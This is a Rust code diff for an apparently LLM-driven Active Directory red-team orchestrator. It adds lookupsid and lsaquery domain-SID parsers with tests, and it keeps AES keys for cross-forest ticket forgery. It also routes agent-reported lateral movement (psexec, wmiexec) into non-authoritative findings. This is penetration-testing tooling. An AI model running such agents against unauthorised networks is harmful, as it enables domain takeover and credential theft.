+ disc_type, + &request.tool_name, + di.target_user.as_deref(), + None, + di.target_ip.as_deref(), + di.target_fqdn.as_deref(), + dt, + request.operation_id.as_deref(), + ); + let _guard = span.enter(); + } } } } diff --git a/ares-core/src/correlation/redblue/tests.rs b/ares-core/src/correlation/redblue/tests.rs index 319e70dd..5f5c0264 100644 --- a/ares-core/src/correlation/redblue/tests.rs +++ b/ares-core/src/correlation/redblue/tests.rs @@ -769,6 +769,10 @@ fn new_custom_time_window() { assert_eq!(correlator.time_window.num_minutes(), 60); } +// ----------------------------------------------------------------------- +// recommend_detection — exhaustive per-technique checks +// ----------------------------------------------------------------------- + #[test] fn recommend_detection_t1046_mentions_scanning() { let activity = make_red_activity("T1046", "192.168.58.10", utc(12, 0)); @@ -817,6 +821,10 @@ fn recommend_detection_unknown_technique_returns_none() { assert!(RedBlueCorrelator::recommend_detection(&activity).is_none()); } +// ----------------------------------------------------------------------- +// determine_gap_reason — additional edge cases +// ----------------------------------------------------------------------- + #[test] fn determine_gap_reason_empty_detections_list() { let activity = make_red_activity("T1046", "192.168.58.10", utc(12, 0)); @@ -838,6 +846,10 @@ fn determine_gap_reason_technique_matches_via_parent() { assert!(reason.contains("Alert exists but did not trigger")); } +// ----------------------------------------------------------------------- +// correlate — additional edge cases +// ----------------------------------------------------------------------- + #[test] fn correlate_false_positive_rate_zero_when_no_detections_in_window() { let correlator = RedBlueCorrelator::new("/tmp", Some(5)); diff --git a/ares-core/src/parsing/domain_sid.rs b/ares-core/src/parsing/domain_sid.rs index b7ee5a01..614c307e 100644 --- 
a/ares-core/src/parsing/domain_sid.rs +++ b/ares-core/src/parsing/domain_sid.rs @@ -6,15 +6,64 @@ use std::sync::LazyLock;
 static DOMAIN_SID_RE: LazyLock<Regex> =
     LazyLock::new(|| Regex::new(r"S-1-5-21-\d+-\d+-\d+").expect("domain sid regex"));
+/// Match the impacket-lookupsid "Domain SID is:" announcement line — the
+/// authoritative signal that the surrounding output is a genuine LSARPC SID
+/// brute-force, not arbitrary recon text containing stray SIDs.
+pub static LOOKUPSID_HEADER_RE: LazyLock<Regex> = LazyLock::new(|| {
+    Regex::new(r"(?m)^\[\*\]\s+Domain SID is:\s+(S-1-5-21-\d+-\d+-\d+)")
+        .expect("lookupsid header regex")
+});
+
+/// Match `rpcclient -c lsaquery` output. Produces:
+///
+/// ```text
+/// Domain Name: ESSOS
+/// Domain Sid: S-1-5-21-3030751166-2423545109-3706592460
+/// ```
+///
+/// Like impacket-lookupsid, this is an authoritative LSARPC response — the
+/// flat name and SID together belong to the queried server's primary domain.
+/// Often works with anonymous/null sessions where impacket-lookupsid fails,
+/// so it's the primary unauth path for cross-forest target SID discovery.
+pub static LSAQUERY_DOMAIN_SID_RE: LazyLock<Regex> = LazyLock::new(|| {
+    Regex::new(r"(?m)^Domain Name:\s+(\S+)\s*\r?\nDomain Sid:\s+(S-1-5-21-\d+-\d+-\d+)")
+        .expect("lsaquery domain sid regex")
+});
+
 /// Regex to extract the RID-500 account name from lookupsid output.
 /// Matches lines like: `500: DOMAIN\AccountName (SidTypeUser)`
 static RID500_RE: LazyLock<Regex> = LazyLock::new(|| {
     Regex::new(r"(?m)^500:\s+[^\\]+\\(.+?)\s+\(SidTypeUser\)").expect("rid500 regex")
 });
-/// Extract the first domain SID (`S-1-5-21-...`) found in the output.
+/// Regex matching any RID line in lookupsid output to capture the flat/NetBIOS
+/// domain name. Matches lines like: `500: DOMAIN\AccountName (SidType...)`.
+static RID_FLAT_NAME_RE: LazyLock<Regex> = LazyLock::new(|| {
+    Regex::new(r"(?m)^\d+:\s+([^\\\s]+)\\.+?\s+\(SidType").expect("rid flat name regex")
+});
+
+/// Extract the first *bare* domain SID (`S-1-5-21-A-B-C`) found in the output.
+///
+/// "Bare" means the matched SID is **not** the prefix of a longer principal
+/// SID like `S-1-5-21-A-B-C-RID`. Such longer SIDs appear in LDAP recon
+/// output as Foreign Security Principals (e.g. `S-1-5-21-…-519` for a
+/// foreign Enterprise Admins group) and previously caused this function to
+/// truncate them into a fake "domain SID" that didn't belong to any domain
+/// — which then misled the orchestrator into forging tickets with the wrong
+/// ExtraSid.
 pub fn extract_domain_sid(output: &str) -> Option<String> {
-    DOMAIN_SID_RE.find(output).map(|m| m.as_str().to_string())
+    let bytes = output.as_bytes();
+    for m in DOMAIN_SID_RE.find_iter(output) {
+        let end = m.end();
+        let next = bytes.get(end).copied();
+        let after_next = bytes.get(end + 1).copied();
+        // Reject when the match is followed by `-` and a digit (truncated longer SID).
+        if next == Some(b'-') && matches!(after_next, Some(b) if b.is_ascii_digit()) {
+            continue;
+        }
+        return Some(m.as_str().to_string());
+    }
+    None
 }
 /// Extract the account name for RID 500 from lookupsid output. @@ -27,6 +76,36 @@ pub fn extract_rid500_name(output: &str) -> Option<String> {
     RID500_RE.captures(output).map(|c| c[1].to_string())
 }
+/// Extract `(flat_name, sid)` together from lookupsid output, anchoring the
+/// SID to the NetBIOS/flat name visible on the same RID lines.
+///
+/// Returns `None` if either the SID or the flat name is missing — the caller
+/// must then resolve the FQDN itself rather than guessing from task context.
+///
+/// Why this matters: a task targeting `north.contoso.local` can produce output
+/// referencing `S-1-5-21-…` for the trusted forest's domain (e.g. via lookupsid
+/// over a foreign trust).
Anchoring to the flat name lets the caller map the +/// SID to the correct FQDN via `netbios_to_fqdn` instead of misattributing it +/// to the task's source domain. +pub fn extract_domain_sid_and_flat_name(output: &str) -> Option<(String, String)> { + let sid = extract_domain_sid(output)?; + let flat = RID_FLAT_NAME_RE + .captures(output) + .map(|c| c[1].to_uppercase())?; + Some((flat, sid)) +} + +/// Extract `(flat_name, sid)` from `rpcclient lsaquery` output. Returns the +/// queried server's primary-domain flat name (uppercased) paired with the +/// authoritative LSARPC-reported domain SID. Returns `None` if the output is +/// not from `lsaquery` or only one of the two fields is present. +pub fn extract_lsaquery_domain_sid(output: &str) -> Option<(String, String)> { + let caps = LSAQUERY_DOMAIN_SID_RE.captures(output)?; + let flat = caps.get(1)?.as_str().to_uppercase(); + let sid = caps.get(2)?.as_str().to_string(); + Some((flat, sid)) +} + #[cfg(test)] mod tests { use super::*; @@ -103,4 +182,138 @@ mod tests { None ); } + + #[test] + fn extracts_flat_name_alongside_sid() { + let output = "[*] Brute forcing SIDs at 192.168.58.10\n\ + [*] Domain SID is: S-1-5-21-100-200-300\n\ + 498: CONTOSO\\Enterprise Read-only Domain Controllers (SidTypeGroup)\n\ + 500: CONTOSO\\Administrator (SidTypeUser)\n"; + let result = extract_domain_sid_and_flat_name(output); + assert_eq!( + result, + Some(("CONTOSO".to_string(), "S-1-5-21-100-200-300".to_string())) + ); + } + + #[test] + fn extract_flat_name_and_sid_uppercases() { + let output = "[*] Domain SID is: S-1-5-21-1-2-3\n\ + 500: contoso\\Administrator (SidTypeUser)\n"; + let result = extract_domain_sid_and_flat_name(output); + assert_eq!(result.as_ref().map(|(f, _)| f.as_str()), Some("CONTOSO")); + } + + #[test] + fn extract_flat_name_without_sid_returns_none() { + let output = "500: CONTOSO\\Administrator (SidTypeUser)\n"; + assert_eq!(extract_domain_sid_and_flat_name(output), None); + } + + #[test] + fn 
extract_flat_name_without_rid_lines_returns_none() {
+        let output = "[*] Domain SID is: S-1-5-21-1-2-3\n";
+        assert_eq!(extract_domain_sid_and_flat_name(output), None);
+    }
+
+    #[test]
+    fn extract_domain_sid_skips_truncated_principal_sid() {
+        // Foreign-security-principal SID `…-519` (Enterprise Admins) must NOT
+        // be silently truncated to a fake domain SID. This was the root cause
+        // of op-20260429-164553 forging a ticket with the wrong ExtraSid.
+        let output = "objectSid: S-1-5-21-3030751166-2423545109-3706592460-519\n";
+        assert_eq!(extract_domain_sid(output), None);
+    }
+
+    #[test]
+    fn extract_domain_sid_skips_principal_returns_later_bare_sid() {
+        let output =
+            "fsp: S-1-5-21-100-200-300-519\nDomain SID is: S-1-5-21-916080216-17955212-404331485\n";
+        assert_eq!(
+            extract_domain_sid(output),
+            Some("S-1-5-21-916080216-17955212-404331485".to_string())
+        );
+    }
+
+    #[test]
+    fn extract_domain_sid_accepts_bare_sid_followed_by_dash_letter() {
+        // A trailing `-` followed by letters (e.g. inside a CN) is fine — only `-`
+        // followed by a digit indicates a truncated longer principal SID.
+ let output = "S-1-5-21-100-200-300-foo\n"; + assert_eq!( + extract_domain_sid(output), + Some("S-1-5-21-100-200-300".to_string()) + ); + } + + #[test] + fn extract_domain_sid_accepts_bare_sid_at_end_of_input() { + let output = "S-1-5-21-100-200-300"; + assert_eq!( + extract_domain_sid(output), + Some("S-1-5-21-100-200-300".to_string()) + ); + } + + #[test] + fn extract_lsaquery_basic() { + let output = "Domain Name: ESSOS\n\ + Domain Sid: S-1-5-21-3030751166-2423545109-3706592460\n"; + assert_eq!( + extract_lsaquery_domain_sid(output), + Some(( + "ESSOS".to_string(), + "S-1-5-21-3030751166-2423545109-3706592460".to_string() + )) + ); + } + + #[test] + fn extract_lsaquery_with_preamble() { + let output = "[*] Connecting to 10.1.2.58\n\ + Domain Name: CONTOSO\n\ + Domain Sid: S-1-5-21-100-200-300\n\ + [*] Done.\n"; + assert_eq!( + extract_lsaquery_domain_sid(output), + Some(("CONTOSO".to_string(), "S-1-5-21-100-200-300".to_string())) + ); + } + + #[test] + fn extract_lsaquery_uppercases_flat_name() { + let output = "Domain Name: contoso\nDomain Sid: S-1-5-21-1-2-3\n"; + assert_eq!( + extract_lsaquery_domain_sid(output).map(|(f, _)| f), + Some("CONTOSO".to_string()) + ); + } + + #[test] + fn extract_lsaquery_handles_crlf() { + let output = "Domain Name: ESSOS\r\nDomain Sid: S-1-5-21-1-2-3\r\n"; + assert_eq!( + extract_lsaquery_domain_sid(output).map(|(_, s)| s), + Some("S-1-5-21-1-2-3".to_string()) + ); + } + + #[test] + fn extract_lsaquery_requires_both_lines() { + // Missing Domain Sid line + let no_sid = "Domain Name: ESSOS\n"; + assert_eq!(extract_lsaquery_domain_sid(no_sid), None); + // Missing Domain Name line + let no_name = "Domain Sid: S-1-5-21-1-2-3\n"; + assert_eq!(extract_lsaquery_domain_sid(no_name), None); + } + + #[test] + fn extract_lsaquery_requires_adjacency() { + // Lines not adjacent — pattern intentionally requires them on + // consecutive lines so we don't pair the wrong (flat, sid) when + // multiple servers/responses are concatenated. 
+        let output = "Domain Name: ESSOS\nUnrelated line here\nDomain Sid: S-1-5-21-1-2-3\n";
+        assert_eq!(extract_lsaquery_domain_sid(output), None);
+    }
 }
diff --git a/ares-core/src/state/mock_redis.rs b/ares-core/src/state/mock_redis.rs index de7bbd13..639cefbf 100644 --- a/ares-core/src/state/mock_redis.rs +++ b/ares-core/src/state/mock_redis.rs @@ -12,6 +12,10 @@ use std::sync::{Arc, Mutex};
 use redis::aio::ConnectionLike;
 use redis::{Cmd, ErrorKind, Pipeline, RedisError, RedisResult, Value};
+// ---------------------------------------------------------------------------
+// Storage types
+// ---------------------------------------------------------------------------
+
 enum Stored {
     Str(Vec<u8>),
     Hash(HashMap<Vec<u8>, Vec<u8>>),
@@ -21,6 +25,10 @@ type Data = HashMap<String, Stored>;
+// ---------------------------------------------------------------------------
+// MockRedisConnection
+// ---------------------------------------------------------------------------
+
 /// Minimal in-memory Redis mock that supports the command subset used by
 /// `ares-core::state` and `ares-cli::orchestrator::task_queue`.
#[derive(Clone)] @@ -96,6 +104,10 @@ impl MockRedisConnection {
     }
 }
+// ---------------------------------------------------------------------------
+// ConnectionLike impl
+// ---------------------------------------------------------------------------
+
 impl ConnectionLike for MockRedisConnection {
     fn req_packed_command<'a>(&'a mut self, cmd: &'a Cmd) -> redis::RedisFuture<'a, Value> {
         let mut data = self.data.lock().unwrap();
@@ -126,6 +138,10 @@ impl ConnectionLike for MockRedisConnection {
     }
 }
+// ---------------------------------------------------------------------------
+// Command implementations (free functions operating on Data)
+// ---------------------------------------------------------------------------
+
 fn key(args: &[Vec<u8>], idx: usize) -> String {
     String::from_utf8_lossy(args.get(idx).map(|v| v.as_slice()).unwrap_or_default()).into_owned()
 }
@@ -523,6 +539,10 @@ fn cmd_scan(data: &Data, args: &[Vec<u8>]) -> RedisResult<Value> {
     ]))
 }
+// ---------------------------------------------------------------------------
+// Minimal glob matching (supports only `*` wildcard segments)
+// ---------------------------------------------------------------------------
+
 fn glob_match(pattern: &str, input: &str) -> bool {
     let parts: Vec<&str> = pattern.split('*').collect();
     if parts.len() == 1 {
diff --git a/ares-core/src/state/reader.rs b/ares-core/src/state/reader.rs index 5b6bd72b..d4d3facc 100644 --- a/ares-core/src/state/reader.rs +++ b/ares-core/src/state/reader.rs @@ -347,8 +347,26 @@ impl RedisStateReader {
         let added: bool = conn.hset_nx(&key, &dedup_field, &data).await?;
         if added {
             let _: () = conn.expire(&key, 86400).await?;
+            return Ok(true);
         }
-        Ok(added)
+
+        // Upsert path: a prior call added this user/hash with no AES256 key,
+        // and this call carries one. Win2016+ DCs reject RC4-only inter-realm
+        // tickets, so the AES key is required for cross-forest forge — we
+        // can't afford to lose it to dedup.
+        if hash.aes_key.is_some() {
+            let existing: Option<String> = conn.hget(&key, &dedup_field).await?;
+            let existing_has_aes = existing
+                .as_deref()
+                .and_then(|s| serde_json::from_str::<Hash>(s).ok())
+                .and_then(|h| h.aes_key)
+                .is_some();
+            if !existing_has_aes {
+                let _: () = conn.hset(&key, &dedup_field, &data).await?;
+                let _: () = conn.expire(&key, 86400).await?;
+            }
+        }
+        Ok(false)
     }
     /// Set a meta field in the operation's meta HASH.
diff --git a/ares-core/src/telemetry/spans/builder.rs b/ares-core/src/telemetry/spans/builder.rs index 8e6b58c5..e8600c40 100644 --- a/ares-core/src/telemetry/spans/builder.rs +++ b/ares-core/src/telemetry/spans/builder.rs @@ -58,13 +58,24 @@ impl AgentSpanBuilder {
         self
     }
+    /// Set the target IP. Rejects CIDR ranges and multi-value strings.
     pub fn target_ip(mut self, ip: impl Into<String>) -> Self {
-        self.target.ip = Some(ip.into());
+        let ip = ip.into();
+        // Defense-in-depth: reject values that aren't single IP addresses.
+        // extract_target_info should already sanitize, but guard here too.
+        if !ip.contains('/') && !ip.contains(' ') && ip.parse::<std::net::IpAddr>().is_ok() {
+            self.target.ip = Some(ip);
+        }
         self
     }
+    /// Set the target FQDN. Rejects multi-value strings.
    pub fn target_fqdn(mut self, fqdn: impl Into<String>) -> Self {
-        self.target.fqdn = Some(fqdn.into());
+        let fqdn = fqdn.into();
+        // Defense-in-depth: reject values containing spaces or slashes
+        if !fqdn.contains(' ') && !fqdn.contains('/') {
+            self.target.fqdn = Some(fqdn);
+        }
         self
     }
diff --git a/ares-core/src/telemetry/target.rs b/ares-core/src/telemetry/target.rs index d7fd9f26..68eced4d 100644 --- a/ares-core/src/telemetry/target.rs +++ b/ares-core/src/telemetry/target.rs @@ -17,6 +17,11 @@ pub struct ToolTargetInfo {
 /// - IP: `target_ip`, `target`, `host`, `ip` (if it looks like an IP)
 /// - FQDN: `target_fqdn`, `target`, `host`, `hostname` (if it looks like an FQDN)
 /// - User: `username`, `user`, `target_user`
+///
+/// Values are sanitized before validation: multi-token strings (e.g.,
+/// `"192.168.58.10 192.168.58.20"` or nmap arguments) are split and only the
+/// first token is considered. CIDR ranges (`10.0.0.0/24`) are rejected
+/// because they represent networks, not individual hosts.
pub fn extract_target_info(arguments: &serde_json::Value) -> ToolTargetInfo { let mut info = ToolTargetInfo::default(); @@ -25,21 +30,23 @@ pub fn extract_target_info(arguments: &serde_json::Value) -> ToolTargetInfo { None => return info, }; - // Extract IP + // Extract IP — sanitize multi-token values first for key in &["target_ip", "target", "host", "ip"] { if let Some(val) = obj.get(*key).and_then(|v| v.as_str()) { - if is_ip_address(val) { - info.target_ip = Some(val.to_string()); + let sanitized = first_token(val); + if !is_cidr(sanitized) && is_ip_address(sanitized) { + info.target_ip = Some(sanitized.to_string()); break; } } } - // Extract FQDN + // Extract FQDN — sanitize multi-token values first for key in &["target_fqdn", "target", "host", "hostname"] { if let Some(val) = obj.get(*key).and_then(|v| v.as_str()) { - if is_likely_fqdn(val) { - info.target_fqdn = Some(val.to_string()); + let sanitized = first_token(val); + if is_likely_fqdn(sanitized) { + info.target_fqdn = Some(sanitized.to_string()); break; } } @@ -110,6 +117,29 @@ pub fn infer_target_type_from_info(info: &ToolTargetInfo) -> Option<&'static str None } +/// Extract the first whitespace/comma-delimited token from a string. +/// +/// Handles cases where LLM agents pass multi-IP scan results or +/// nmap arguments in a single field, e.g.: +/// - `"192.168.58.10 192.168.58.20 192.168.58.30"` → `"192.168.58.10"` +/// - `"192.168.58.40 -p 53,88 --open"` → `"192.168.58.40"` +fn first_token(s: &str) -> &str { + s.split_whitespace().next().unwrap_or(s) +} + +/// Returns true for CIDR notation like `10.0.0.0/24`. +/// +/// CIDR ranges represent networks, not individual hosts, so they +/// must not be used as `destination.address` span values. 
+fn is_cidr(s: &str) -> bool {
+    if let Some((ip_part, mask)) = s.rsplit_once('/') {
+        if let Ok(bits) = mask.parse::<u8>() {
+            return bits <= 128 && ip_part.parse::<std::net::IpAddr>().is_ok();
+        }
+    }
+    false
+}
+
 fn is_ip_address(s: &str) -> bool {
     s.parse::<std::net::IpAddr>().is_ok()
 }
@@ -182,6 +212,66 @@ mod tests {
         assert!(info.target_fqdn.is_none());
     }
+    #[test]
+    fn extract_target_info_rejects_cidr() {
+        let args = serde_json::json!({"target": "192.168.58.0/24"});
+        let info = extract_target_info(&args);
+        assert!(
+            info.target_ip.is_none(),
+            "CIDR should not be used as target_ip"
+        );
+        assert!(info.target_fqdn.is_none());
+    }
+
+    #[test]
+    fn extract_target_info_rejects_cidr_in_target_ip() {
+        let args = serde_json::json!({"target_ip": "192.168.58.0/25"});
+        let info = extract_target_info(&args);
+        assert!(
+            info.target_ip.is_none(),
+            "CIDR should not be used as target_ip"
+        );
+    }
+
+    #[test]
+    fn extract_target_info_multi_ip_takes_first() {
+        let args = serde_json::json!({"target": "192.168.58.10 192.168.58.20 192.168.58.30"});
+        let info = extract_target_info(&args);
+        assert_eq!(info.target_ip.as_deref(), Some("192.168.58.10"));
+    }
+
+    #[test]
+    fn extract_target_info_nmap_args_takes_first_ip() {
+        let args = serde_json::json!({"target": "192.168.58.40 -p 53,88,135 --open -sv -o"});
+        let info = extract_target_info(&args);
+        assert_eq!(info.target_ip.as_deref(), Some("192.168.58.40"));
+    }
+
+    #[test]
+    fn extract_target_info_multi_fqdn_takes_first() {
+        let args = serde_json::json!({"target": "dc01.contoso.local dc02.contoso.local"});
+        let info = extract_target_info(&args);
+        assert_eq!(info.target_fqdn.as_deref(), Some("dc01.contoso.local"));
+    }
+
+    #[test]
+    fn first_token_extracts_correctly() {
+        assert_eq!(first_token("192.168.58.10 192.168.58.20"), "192.168.58.10");
+        assert_eq!(first_token("192.168.58.40 -p 53,88"), "192.168.58.40");
+        assert_eq!(first_token("single"), "single");
+        assert_eq!(first_token(""), "");
+    }
+
+    #[test]
+    fn is_cidr_detects_ranges() {
        assert!(is_cidr("192.168.58.0/24"));
+        assert!(is_cidr("192.168.0.0/16"));
+        assert!(is_cidr("10.0.0.0/8"));
+        assert!(!is_cidr("192.168.58.10"));
+        assert!(!is_cidr("dc01.contoso.local"));
+        assert!(!is_cidr("192.168.58.0/abc"));
+    }
+
     #[test]
     fn infer_from_info_fqdn() {
         let info = ToolTargetInfo {
diff --git a/ares-llm/src/agent_loop/callbacks.rs b/ares-llm/src/agent_loop/callbacks.rs index 28f11eec..4687ba77 100644 --- a/ares-llm/src/agent_loop/callbacks.rs +++ b/ares-llm/src/agent_loop/callbacks.rs @@ -61,10 +61,37 @@ pub(super) fn handle_builtin_callback(call: &ToolCall) -> Result<CallbackResult>
                 .as_str()
                 .unwrap_or("")
                 .to_string();
-            info!(finding_type = %finding_type, "Finding reported: {description}");
-            Ok(CallbackResult::Continue(format!(
-                "Finding recorded: {finding_type}"
-            )))
+            let target = call.arguments["target"].as_str().unwrap_or("").to_string();
+            let severity = call.arguments["severity"]
+                .as_str()
+                .unwrap_or("info")
+                .to_string();
+            info!(finding_type = %finding_type, target = %target, severity = %severity, "Finding reported: {description}");
+
+            // Route into `llm_findings` (NOT `discoveries`). The LLM-asserted
+            // payload reaches reports for context but MUST NOT feed
+            // `publish_vulnerability` — only parser-produced discoveries do.
+ let vuln_id = if target.is_empty() { + format!("finding_{finding_type}") + } else { + format!("finding_{}_{}", finding_type, target.replace('.', "_")) + }; + let finding = serde_json::json!({ + "vulnerabilities": [{ + "vuln_id": vuln_id, + "vuln_type": finding_type, + "target": target, + "details": { + "description": description, + "severity": severity, + "discovered_by": "agent_report_finding", + }, + }] + }); + Ok(CallbackResult::LlmFinding { + response: format!("Finding recorded: {finding_type}"), + finding, + }) } "report_lateral_success" => { let target = call.arguments["target_ip"] @@ -77,9 +104,25 @@ pub(super) fn handle_builtin_callback(call: &ToolCall) -> Result .unwrap_or("") .to_string(); info!(target = %target, technique = %technique, "Lateral movement succeeded"); - Ok(CallbackResult::Continue(format!( - "Lateral movement recorded: {technique} → {target}" - ))) + + // Surface as an LLM finding only — does NOT feed `publish_vulnerability`. + let vuln_id = format!("lateral_success_{}_{}", technique, target.replace('.', "_")); + let finding = serde_json::json!({ + "vulnerabilities": [{ + "vuln_id": vuln_id, + "vuln_type": format!("lateral_{technique}"), + "target": target, + "details": { + "description": format!("Successful lateral movement via {technique}"), + "severity": "high", + "discovered_by": "agent_lateral_movement", + }, + }] + }); + Ok(CallbackResult::LlmFinding { + response: format!("Lateral movement recorded: {technique} → {target}"), + finding, + }) } "report_lateral_failed" => { let target = call.arguments["target_ip"] @@ -344,14 +387,18 @@ mod tests { fn report_finding() { let call = make_call( "report_finding", - serde_json::json!({"finding_type": "kerberoastable_account", "description": "Found SPN"}), + serde_json::json!({"finding_type": "kerberoastable_account", "description": "Found SPN", "target": "192.168.58.10"}), ); let result = handle_builtin_callback(&call).unwrap(); match result { - CallbackResult::Continue(msg) => { - 
assert!(msg.contains("kerberoastable_account")); + CallbackResult::LlmFinding { response, finding } => { + assert!(response.contains("kerberoastable_account")); + let vulns = finding["vulnerabilities"].as_array().unwrap(); + assert_eq!(vulns.len(), 1); + assert_eq!(vulns[0]["vuln_type"], "kerberoastable_account"); + assert_eq!(vulns[0]["target"], "192.168.58.10"); } - other => panic!("Expected Continue, got {other:?}"), + other => panic!("Expected LlmFinding, got {other:?}"), } } @@ -363,11 +410,14 @@ mod tests { ); let result = handle_builtin_callback(&call).unwrap(); match result { - CallbackResult::Continue(msg) => { - assert!(msg.contains("psexec")); - assert!(msg.contains("192.168.58.10")); + CallbackResult::LlmFinding { response, finding } => { + assert!(response.contains("psexec")); + assert!(response.contains("192.168.58.10")); + let vulns = finding["vulnerabilities"].as_array().unwrap(); + assert_eq!(vulns.len(), 1); + assert_eq!(vulns[0]["vuln_type"], "lateral_psexec"); } - other => panic!("Expected Continue, got {other:?}"), + other => panic!("Expected LlmFinding, got {other:?}"), } } @@ -380,11 +430,13 @@ mod tests { ); let result = handle_builtin_callback(&call).unwrap(); match result { - CallbackResult::Continue(msg) => { - assert!(msg.contains("wmiexec")); - assert!(msg.contains("srv01.contoso.local")); + CallbackResult::LlmFinding { response, finding } => { + assert!(response.contains("wmiexec")); + assert!(response.contains("srv01.contoso.local")); + let vulns = finding["vulnerabilities"].as_array().unwrap(); + assert_eq!(vulns[0]["vuln_type"], "lateral_wmiexec"); } - other => panic!("Expected Continue, got {other:?}"), + other => panic!("Expected LlmFinding, got {other:?}"), } } diff --git a/ares-llm/src/agent_loop/runner.rs b/ares-llm/src/agent_loop/runner.rs index 72ab7db9..d4a6e4ac 100644 --- a/ares-llm/src/agent_loop/runner.rs +++ b/ares-llm/src/agent_loop/runner.rs @@ -127,6 +127,7 @@ pub async fn run_agent_loop( let mut steps: u32 = 0; let 
mut tool_calls_dispatched: u32 = 0;
     let mut all_discoveries: Vec<serde_json::Value> = Vec::new();
+    let mut all_llm_findings: Vec<serde_json::Value> = Vec::new();
     let mut all_tool_outputs: Vec<String> = Vec::new();
     // Dynamic tool filtering: track unavailable tools and per-tool call counts
@@ -146,6 +147,7 @@ pub async fn run_agent_loop(
                 total_usage,
                 tool_calls_dispatched,
                 all_discoveries,
+                all_llm_findings,
                 all_tool_outputs,
             );
         }
@@ -170,6 +172,7 @@ pub async fn run_agent_loop(
                 total_usage,
                 tool_calls_dispatched,
                 all_discoveries,
+                all_llm_findings,
                 all_tool_outputs,
             );
         }
@@ -227,6 +230,7 @@ pub async fn run_agent_loop(
                 total_usage,
                 tool_calls_dispatched,
                 all_discoveries,
+                all_llm_findings,
                 all_tool_outputs,
             );
         }
@@ -263,6 +267,7 @@ pub async fn run_agent_loop(
                 total_usage,
                 tool_calls_dispatched,
                 all_discoveries,
+                all_llm_findings,
                 all_tool_outputs,
             );
         }
@@ -274,6 +279,7 @@ pub async fn run_agent_loop(
                 total_usage,
                 tool_calls_dispatched,
                 all_discoveries,
+                all_llm_findings,
                 all_tool_outputs,
             );
         }
@@ -551,6 +557,7 @@ pub async fn run_agent_loop(
                 total_usage,
                 tool_calls_dispatched,
                 all_discoveries,
+                all_llm_findings,
                 all_tool_outputs,
             );
         }
@@ -563,6 +570,7 @@ pub async fn run_agent_loop(
                 total_usage,
                 tool_calls_dispatched,
                 all_discoveries,
+                all_llm_findings,
                 all_tool_outputs,
             );
         }
@@ -573,6 +581,10 @@ pub async fn run_agent_loop(
                 }
                 messages.push(tr);
             }
+            Ok(CallbackResult::LlmFinding { response, finding }) => {
+                all_llm_findings.push(finding);
+                messages.push(ChatMessage::tool_result(&call_id, &response));
+            }
             Err(e) => {
                 let tr = ChatMessage::tool_result(
                     &call_id,
@@ -625,6 +637,7 @@ pub async fn run_agent_loop(
                 total_usage,
                 tool_calls_dispatched,
                 all_discoveries,
+                all_llm_findings,
                 all_tool_outputs,
             );
         }
@@ -637,6 +650,7 @@ pub async fn run_agent_loop(
                 total_usage,
                 tool_calls_dispatched,
                 all_discoveries,
+                all_llm_findings,
                 all_tool_outputs,
             );
         }
@@ -647,6 +661,10 @@ pub async fn run_agent_loop(
                 }
                 messages.push(tr);
             }
+            Ok(CallbackResult::LlmFinding { response, finding }) => {
+
all_llm_findings.push(finding); + messages.push(ChatMessage::tool_result(&call.id, &response)); + } Err(e) => { let tr = ChatMessage::tool_result(&call.id, format!("Callback error: {e}")); @@ -697,6 +715,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -709,6 +728,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -719,6 +739,10 @@ pub async fn run_agent_loop( } messages.push(tr); } + Ok(CallbackResult::LlmFinding { response, finding }) => { + all_llm_findings.push(finding); + messages.push(ChatMessage::tool_result(&call.id, &response)); + } Err(e) => { let tr = ChatMessage::tool_result(&call.id, format!("Callback error: {e}")); if session_log.enabled() { @@ -734,6 +758,7 @@ pub async fn run_agent_loop( /// Centralized exit path: writes the terminal `outcome` record to the /// session log and assembles the `AgentLoopOutcome`. 
+#[allow(clippy::too_many_arguments)]
 fn finish(
     session_log: &SessionLog,
     steps: u32,
@@ -741,6 +766,7 @@ fn finish(
     total_usage: TokenUsage,
     tool_calls_dispatched: u32,
     discoveries: Vec<serde_json::Value>,
+    llm_findings: Vec<serde_json::Value>,
     tool_outputs: Vec<String>,
 ) -> AgentLoopOutcome {
     if session_log.enabled() {
@@ -753,6 +779,7 @@ fn finish(
         steps,
         tool_calls_dispatched,
         discoveries,
+        llm_findings,
         tool_outputs,
     }
 }
diff --git a/ares-llm/src/agent_loop/tests.rs b/ares-llm/src/agent_loop/tests.rs index e9bdec6c..f683be0b 100644 --- a/ares-llm/src/agent_loop/tests.rs +++ b/ares-llm/src/agent_loop/tests.rs @@ -57,10 +57,12 @@ fn handle_report_finding_callback() {
     };
     let result = handle_builtin_callback(&call).unwrap();
     match result {
-        CallbackResult::Continue(msg) => {
-            assert!(msg.contains("smb_signing_disabled"));
+        CallbackResult::LlmFinding { response, finding } => {
+            assert!(response.contains("smb_signing_disabled"));
+            let vulns = finding["vulnerabilities"].as_array().unwrap();
+            assert_eq!(vulns[0]["vuln_type"], "smb_signing_disabled");
         }
-        _ => panic!("Expected Continue"),
+        _ => panic!("Expected LlmFinding"),
     }
 }
diff --git a/ares-llm/src/agent_loop/types.rs b/ares-llm/src/agent_loop/types.rs index 9c3bf8bf..933da384 100644 --- a/ares-llm/src/agent_loop/types.rs +++ b/ares-llm/src/agent_loop/types.rs @@ -40,6 +40,14 @@ pub enum CallbackResult {
     RequestAssistance { issue: String, context: String },
     /// Callback processed, continue the loop with this response.
     Continue(String),
+    /// LLM-fabricated finding — continue the loop and route the structured
+    /// payload into `llm_findings` (NOT `discoveries`). Reports may surface
+    /// these for context, but they MUST NOT feed `publish_*` state writes;
+    /// only parser-produced discoveries are authoritative.
+    LlmFinding {
+        response: String,
+        finding: serde_json::Value,
+    },
 }
 /// Trait for providing custom callback handlers to the agent loop. @@ -78,7 +86,13 @@ pub struct AgentLoopOutcome {
     /// Number of tool calls dispatched.
    pub tool_calls_dispatched: u32,
     /// Accumulated structured discoveries from all tool results.
+    /// Only parser-produced — never LLM-fabricated. Safe to feed into
+    /// `extract_discoveries` → `publish_*`.
     pub discoveries: Vec<serde_json::Value>,
+    /// LLM-fabricated findings (`report_finding` / `report_lateral_success`).
+    /// Surfaced in reports but never used as authoritative state — must never
+    /// feed `publish_*` calls.
+    pub llm_findings: Vec<serde_json::Value>,
     /// Raw tool output strings for secondary regex extraction.
     pub tool_outputs: Vec<String>,
 }
